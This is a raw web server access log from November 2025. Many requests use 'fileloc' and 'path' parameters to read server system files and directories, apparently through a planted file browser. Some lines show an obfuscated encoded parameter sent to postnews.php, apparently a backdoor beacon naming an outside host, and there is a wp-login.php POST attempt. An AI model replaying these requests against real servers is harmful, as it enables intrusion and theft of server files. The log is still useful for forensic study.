216.73.216.53 - - [03/Nov/2025:04:19:44 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Fsystemd%2Fsystem-preset%2F99-default-disable.preset&path=%2F%2Flib%2Fsystemd%2Fsystem-preset HTTP/1.0" 200 12423 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:19:45 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/wpa_cli&path=//sbin HTTP/1.0" 200 191763 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:19:47 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FMULLINS_sdma.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 18392 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:19:48 +1000] "GET /1174480?fileloc=//usr/bin/newgidmap&path=//usr/bin HTTP/1.0" 200 66182 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:19:51 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2Fpitcairn_k_smc.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 100038 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:04:16:59 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131313031392p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130373431392q3635333937326439333736323935303433386531383138666334613731363835222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
81.167.26.57 - - [03/Nov/2025:04:19:51 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/wpa_passphrase&path=//sbin HTTP/1.0" 200 98287 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:19:53 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FCAICOS_me.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 20819 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:19:55 +1000] "GET /1174480?fileloc=//usr/bin/ntpstat&path=//usr/bin HTTP/1.0" 200 20289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:19:56 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fauthconfig%2Fauthconfig.pyo&path=%2F%2Fusr%2Fshare%2Fauthconfig HTTP/1.0" 200 55850 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:19:57 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/wpa_supplicant&path=//sbin HTTP/1.0" 200 3049447 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:19:59 +1000] "GET /letters/strojinvest?path=%2F%2Fetc%2Finit.d HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:20:02 +1000] "GET /letters/strojinvest?path=%2F%2Fetc%2Fnginx HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:20:03 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_admin&path=//sbin HTTP/1.0" 200 13911 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.14 - - [03/Nov/2025:04:20:04 +1000] "GET /1174480?fileloc=//usr/bin/nl-neigh-delete&path=//usr/bin HTTP/1.0" 200 26586 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:20:05 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2Fhome%2Fbk%2Fefi%2Feficenter.ru%2Frobots.txt&path=%2Fhome%2Fbk%2Fefi%2Feficenter.ru HTTP/1.0" 200 12624 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:20:08 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_bmap&path=//sbin HTTP/1.0" 200 13064 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:20:11 +1000] "GET /letters/strojinvest?path=%2F%2Fetc%2Fbinfmt.d HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:20:12 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_copy&path=//sbin HTTP/1.0" 200 570585 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.14 - - [03/Nov/2025:04:20:13 +1000] "GET /1174480?fileloc=//usr/bin/sessreg&path=//usr/bin HTTP/1.0" 200 27019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:17:22 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131313034322p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130373434322q6162353139333866306132386238663966356366343261656337343163636564222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:04:20:14 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Fbk%2Fefi%2Feficenter.ru%2FScripts HTTP/1.0" 200 15957 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:20:17 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_db&path=//sbin HTTP/1.0" 200 928187 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:20:17 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fauthconfig%2Fmsgarea.pyo&path=%2F%2Fusr%2Fshare%2Fauthconfig HTTP/1.0" 200 22843 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:20:21 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fauthconfig%2Fdnsclient.pyo&path=%2F%2Fusr%2Fshare%2Fauthconfig HTTP/1.0" 200 24855 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:20:22 +1000] "GET /1353104?path=//etc/lvm HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.167.26.57 - - [03/Nov/2025:04:20:23 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_estimate&path=//sbin HTTP/1.0" 200 26793 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:20:24 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FCAICOS_mc.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 47044 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:20:27 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FCAICOS_pfp.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 18774 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:20:27 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_freeze&path=//sbin HTTP/1.0" 200 13175 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:20:30 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FCAICOS_smc.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 58459 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:20:30 +1000] "GET /1443504?path=//etc/yum HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.167.26.57 - - [03/Nov/2025:04:20:32 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_fsr&path=//sbin HTTP/1.0" 200 57068 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.134.144.77 - - [03/Nov/2025:04:20:31 +1000] "GET /wp-login.php HTTP/1.0" 200 60472 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)"
216.73.216.53 - - [03/Nov/2025:04:20:33 +1000] "GET /1347521008?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.htaccess&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.134.144.77 - - [03/Nov/2025:04:20:36 +1000] "POST /wp-login.php HTTP/1.0" 200 60472 "https://region-logist.ru/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)"
216.73.216.53 - - [03/Nov/2025:04:20:36 +1000] "GET /1347306672?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.htaccess&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:04:17:45 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131313036352p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130373436352q3137646631666135373532616335363437326236353563666633613566363534222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
81.167.26.57 - - [03/Nov/2025:04:20:36 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_growfs&path=//sbin HTTP/1.0" 200 551864 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.14 - - [03/Nov/2025:04:20:38 +1000] "GET /1420432?path=//etc/yum HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:20:39 +1000] "GET /1347436352?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.htaccess&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.165 - - [03/Nov/2025:04:20:36 +1000] "GET /1453376848?shopdetail=1451663808 HTTP/1.0" 200 198120 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [03/Nov/2025:04:20:42 +1000] "GET /1347107184?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.htaccess&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:20:42 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_info&path=//sbin HTTP/1.0" 200 12819 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:20:45 +1000] "GET /1347497648?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.htaccess&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:20:46 +1000] "GET /1540480?path=//lib/kbd HTTP/1.0" 200 17991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.167.26.57 - - [03/Nov/2025:04:20:47 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_io&path=//sbin HTTP/1.0" 200 192746 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:20:48 +1000] "GET /1347105632?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.htaccess&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:20:51 +1000] "GET /1347306672?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F610942 HTTP/1.0" 200 23887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:20:52 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_logprint&path=//sbin HTTP/1.0" 200 594439 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.14 - - [03/Nov/2025:04:20:51 +1000] "GET /1350352?path=//run/log HTTP/1.0" 200 14027 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.167.26.57 - - [03/Nov/2025:04:20:56 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_mdrestore&path=//sbin HTTP/1.0" 200 531965 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.14 - - [03/Nov/2025:04:21:00 +1000] "GET /1440752?path=//var/mail HTTP/1.0" 200 95631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:18:08 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131313038382p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130373438382q6332633639663133353165623631383037356636616536393632306533643933222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
81.167.26.57 - - [03/Nov/2025:04:21:01 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_metadump&path=//sbin HTTP/1.0" 200 13198 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
114.119.141.79 - - [03/Nov/2025:04:21:03 +1000] "GET /2439126144?path=/home/region-gk.ru/data/www/new.region-gk.ru/.tmb HTTP/1.0" 200 14558 "https://region-logist.ru/2439126144?shopdetail=2436250663" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
81.167.26.57 - - [03/Nov/2025:04:21:06 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_mkfile&path=//sbin HTTP/1.0" 200 13505 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.14 - - [03/Nov/2025:04:21:06 +1000] "GET /1549328?path=//sys/bus HTTP/1.0" 200 53163 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.167.26.57 - - [03/Nov/2025:04:21:10 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_ncheck&path=//sbin HTTP/1.0" 200 13069 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.14 - - [03/Nov/2025:04:21:14 +1000] "GET /1529632?path=//usr/tmp HTTP/1.0" 200 14121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.167.26.57 - - [03/Nov/2025:04:21:15 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_quota&path=//sbin HTTP/1.0" 200 137577 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
81.167.26.57 - - [03/Nov/2025:04:21:20 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_repair&path=//sbin HTTP/1.0" 200 926000 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:21:20 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FOLAND_ce.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 21762 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:21:22 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2Fhome%2Fbk%2Fefi%2Feficenter.ru%2Ftest.html&path=%2Fhome%2Fbk%2Fefi%2Feficenter.ru HTTP/1.0" 200 46649 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:21:23 +1000] "GET /1337296?path=//sys/bus HTTP/1.0" 200 53163 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:18:31 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131313131312p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130373531312q3861393061643364663932346333303831313865626361613936366661653735222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:04:21:25 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FCEDAR_smc.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 57207 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:21:25 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xfs_rtcp&path=//sbin HTTP/1.0" 200 31942 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:21:28 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fopt%2Fphp82%2FPEAR%2FPackageFile HTTP/1.0" 200 19839 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:21:30 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/xtables-multi&path=//sbin HTTP/1.0" 200 148836 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
198.244.168.234 - - [03/Nov/2025:04:21:30 +1000] "GET /1440771808?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/.htaccess&path=/home/region-gk.ru/data/www/new.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.53 - - [03/Nov/2025:04:21:31 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FCAYMAN_pfp.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 23225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:21:32 +1000] "GET /1075984?path=//etc/rpm HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:21:34 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Frtlwifi%2Frtl8723befw_36.bin&path=%2F%2Flib%2Ffirmware%2Frtlwifi HTTP/1.0" 200 70387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:21:35 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/zdump&path=//sbin HTTP/1.0" 200 31275 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:21:38 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2F%2Fopt%2Fphp70%2FPEAR%2FPackageFile HTTP/1.0" 200 19839 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:21:40 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/zic&path=//sbin HTTP/1.0" 200 90706 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:21:40 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FMULLINS_me.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 25933 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:21:42 +1000] "GET /1201792?path=//usr/lib HTTP/1.0" 200 57609 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:21:43 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fopt%2Fphp70%2FPEAR%2FPackager.php&path=%2F%2Fopt%2Fphp70%2FPEAR HTTP/1.0" 200 21045 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:21:44 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/zramctl&path=//sbin HTTP/1.0" 200 139308 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
212.16.195.25 - - [03/Nov/2025:04:18:55 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131313133352p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130373533352q6663343134393066326536663331343433643836383030376135636165643337222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:21:50 +1000] "GET /1305248?path=//var/nis HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.167.26.57 - - [03/Nov/2025:04:21:50 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//tmp/.htaccess&path=//tmp HTTP/1.0" 200 12420 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
